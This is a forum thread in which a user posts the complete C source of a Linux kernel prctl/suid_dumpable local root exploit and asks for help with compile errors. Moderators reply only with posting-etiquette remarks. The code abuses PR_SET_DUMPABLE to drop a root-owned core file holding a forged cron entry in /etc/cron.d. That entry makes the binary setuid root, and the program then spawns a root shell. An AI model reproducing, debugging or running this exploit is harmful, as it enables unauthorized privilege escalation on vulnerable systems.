some problmes

mohammed saud's Avatar, Join Date: May 2009
Newbie Member
Code:
:cryin:/* Linux >= 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 *  [PATCH] setuid core dump
 * 
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
 * user setable argument to PR_SET_DUMPABLE.
 * 
 * This flaw allows us to create a root owned coredump into any directory.
 * This is trivially exploitable.
 *
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 2048


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char    crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * *    root     chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char    cronstring[BUFSIZE];
char    fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
    execl(fname, fname, (char *) NULL);
}
    

int    main(int argc, char *argv[]) {

    int nw, pid;

    if (geteuid() == 0) {
        printf("[+] getting root shell\n");
        setuid(0);
        setgid(0);
        if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
            perror("[-] execle");
            return 1;
        }
    }

    printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");

    /* get our file name */
    if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
        perror("[-] readlink");
        printf("This is not fatal, rewrite the exploit\n");
    }

    if (signal(SIGUSR1, sh) == SIG_ERR) {
        perror("[-] signal");
        return 1;
    }
    printf("[+] Installed signal handler\n");

    /* Let us create core files */
    setrlimit(RLIMIT_CORE, &myrlimit);
    if (chdir(CROND) == -1) {
        perror("[-] chdir");
        return 1;
    }

    /* exploit the flaw */
    if (prctl(PR_SET_DUMPABLE, 2) == -1) {
        perror("[-] prtctl");
        printf("Is you kernel version >= 2.6.13 ?\n");
        return 1;
    }

    printf("[+] We are suidsafe dumpable!\n");

    /* Forge the string for our core dump */
    nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
    if (nw >= sizeof(cronstring)) {
        printf("[-] cronstring is too small\n");
        return 1;
    }
    printf("[+] Malicious string forged\n");

    if ((pid=fork()) == -1) {
        perror("[-] fork");
        return 1;
    }

    if (pid == 0) {
        /* This is not the good way to do it ;) */
        sleep(120);
        exit(0);
    }

    /* SEGFAULT the child */
    printf("[+] Segfaulting child\n");
    if (kill(pid, 11) == -1) {
        perror("[-] kill");
        return 1;
    }
    if (gettimeofday(&te, NULL) == 0) 
        printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
    sleep(120);

    printf("[-] It looks like the exploit failed\n");

    return 1;
}
/ I wrot by linux in the terminl it's take for me message some cood problems
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

please and please and please help meeeeeeeeeeeee

Last edited by shabbir; 9Aug2009 at 16:58.. Reason: Code blocks
xpi0t0s's Avatar, Join Date: Aug 2004
Mentor
Please:
(a) Use code blocks when posting code
(b) DO NOT post duplicate threads http://www.go4expert.com/showthread.php?t=18939
(c) be more clear about precisely what help you need and provide all relevant details (which may in this case include some error messages, but to be honest I really can't decode "I wrot by linux in the terminl it's take for me message some cood problems" so it's difficult to guess what details may be relevant.)
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
I deleted other thread.